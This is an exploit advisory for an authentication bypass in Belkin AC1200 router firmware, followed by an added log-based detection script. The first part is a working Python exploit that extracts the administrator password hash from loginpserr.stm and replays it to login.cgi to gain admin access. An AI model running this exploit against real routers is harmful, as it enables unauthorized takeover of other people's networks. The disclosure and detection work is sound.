Belkin AC1200 Router Firmware 1.00.27 – Authentication Bypass

  • Author: Gregory Smiley
    Date: 2016-07-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40081/
'''
# Exploit Title: Belkin Router AC1200, Firmware: 1.00.27 - Authentication Bypass
# Date: 5/11/2016
# Exploit Author: Gregory Smiley
# Contact: gsx0r.sec@gmail.com
# Vendor Homepage: http://www.belkin.com
# Version: Firmware: 1.00.27
# Tested on: F9K1113 v1


#1. Description:

#The Belkin AC1200 is vulnerable to authentication bypass because it performs
#authentication client-side when you attempt to log in after an earlier login
#attempt has failed. The page served in that case, loginpserr.stm, contains the
#MD5 hash of the administrator's password. This can be exploited by extracting
#that hash value and passing it in the pws field of a POST request to login.cgi.

#I would like to note that I contacted Belkin on several occasions
#and gave them plenty of time to reply/fix the issue before releasing this entry.


#2. Proof:

#Line 55 of loginpserr.stm contains the javascript code:

#var password = "md5hashofpassword";


#3. Exploit:
'''

#!/usr/bin/python

import urllib
import urllib2
import sys

router = raw_input('Enter IP address of your AC1200 to test: ')

# Fetch the login-error page directly; on affected firmware it embeds the hash.
page = urllib2.urlopen('http://' + router + '/loginpserr.stm').read()
test_page = page

vuln_string = 'var password = "'

if vuln_string in test_page:
    print 'Router is vulnerable.'
    answer = raw_input('Would you like to exploit the target? Y/N : ')
else:
    print 'Router is not vulnerable.'
    print 'exiting...'
    sys.exit()

if (answer == 'y') or (answer == 'Y'):
    extract = test_page.split(vuln_string, 1)[1]  # These two lines extract the leaked hash value
    _hash = extract.partition('"')[0]             # from /loginpserr.stm using quotes as a delimiter
else:
    if (answer == 'n') or (answer == 'N'):
        print 'exiting...'
    sys.exit()

# Assemble the POST request to /login.cgi
headers = {
    'Host': router,
    'Connection': 'keep-alive',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://' + router + '/',
    'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
    'totalMSec': '0',
    'pws': _hash,
    'url': 'status.stm',
    'arc_action': 'login',
    'pws_temp': ''
}

data = urllib.urlencode(data)

# Sends the POST request with the hash in the pws field
req = urllib2.Request('http://' + router + '/login.cgi', data, headers)
response = urllib2.urlopen(req)
the_page = response.read()

print 'Exploit successful.'
print 'You are now free to navigate to http://' + router + '/ ...as admin ;)'
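The access pattern the advisory describes (a direct fetch of /loginpserr.stm followed shortly by a POST to /login.cgi) is visible in a web access log, which makes it a usable detection signal while a device is still on the affected firmware. The script below is an added detection example and is not part of the original advisory or the author's script. It assumes Common Log Format lines are available from something in front of the device (a reverse proxy or a lab capture; the router's own logging is not described on this page), uses a constructed sample log with documentation-range addresses, and relies on one distinguishing detail: a legitimate user only ever reaches loginpserr.stm after a failed POST to login.cgi, so a GET of that page with no login POST shortly before it, followed by a POST within a short window, is the bypass sequence rather than an ordinary retried login.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common Log Format; the request field is split into method and path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+'
)

ERROR_PAGE = "/loginpserr.stm"   # page the advisory says embeds the password hash
LOGIN_CGI = "/login.cgi"         # endpoint that receives the "pws" field

# Constructed sample access log (not real traffic); 192.0.2.0/24 is a documentation range.
# .10 fetches the error page directly and then posts: the bypass pattern.
# .20 fails a login first, is shown the error page, then retries: a normal user.
# .40 fetches the error page but posts only ten minutes later: outside the default window.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Jul/2016:10:15:01 +0000] "GET /loginpserr.stm HTTP/1.1" 200 5123
192.0.2.10 - - [11/Jul/2016:10:15:03 +0000] "POST /login.cgi HTTP/1.1" 302 0
192.0.2.20 - - [11/Jul/2016:10:16:00 +0000] "POST /login.cgi HTTP/1.1" 200 4411
192.0.2.20 - - [11/Jul/2016:10:16:02 +0000] "GET /loginpserr.stm HTTP/1.1" 200 5123
192.0.2.20 - - [11/Jul/2016:10:16:30 +0000] "POST /login.cgi HTTP/1.1" 302 0
192.0.2.30 - - [11/Jul/2016:10:20:00 +0000] "GET /status.stm HTTP/1.1" 200 2000
192.0.2.40 - - [11/Jul/2016:10:25:00 +0000] "GET /loginpserr.stm HTTP/1.1" 200 5123
192.0.2.40 - - [11/Jul/2016:10:35:00 +0000] "POST /login.cgi HTTP/1.1" 302 0
this line is not a valid log entry and is skipped
"""


def parse_line(line):
    """Return (ip, timestamp, method, path) for a CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    return m.group("ip"), ts, m.group("method"), path


def find_bypass_sequences(log_text, window_seconds=120):
    """Flag clients that fetched the error page directly and then posted to login.cgi.

    A GET of ERROR_PAGE is skipped when the same client posted to LOGIN_CGI within
    the window before it (a failed login followed by the error page is the normal
    flow). Otherwise a POST to LOGIN_CGI within the window after the GET is reported.
    Returns a list of (ip, get_time, post_time) tuples.
    """
    window = timedelta(seconds=window_seconds)
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_ip[ev[0]].append(ev[1:])  # (timestamp, method, path)

    hits = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        for i, (t_get, method, path) in enumerate(events):
            if not (method == "GET" and path == ERROR_PAGE):
                continue
            preceded_by_login = any(
                m == "POST" and p == LOGIN_CGI and t_get - window <= t < t_get
                for t, m, p in events[:i]
            )
            if preceded_by_login:
                continue
            for t_post, m, p in events[i + 1:]:
                if t_post - t_get > window:
                    break
                if m == "POST" and p == LOGIN_CGI:
                    hits.append((ip, t_get, t_post))
                    break
    return hits


if __name__ == "__main__":
    for ip, t_get, t_post in find_bypass_sequences(SAMPLE_LOG):
        print("possible auth-bypass sequence from %s: GET %s at %s, POST %s at %s"
              % (ip, ERROR_PAGE, t_get.isoformat(), LOGIN_CGI, t_post.isoformat()))
```

The window length is a tuning choice: the exploit script on this page issues its POST immediately after the GET, so a short window keeps false positives low, while a longer one catches a slower manual run at the cost of more noise. The log rule is only a stopgap; the defect itself lives in the firmware, which ships the password hash to the client and decides the login there, and the fix is firmware that verifies credentials server-side and stops embedding the hash in loginpserr.stm.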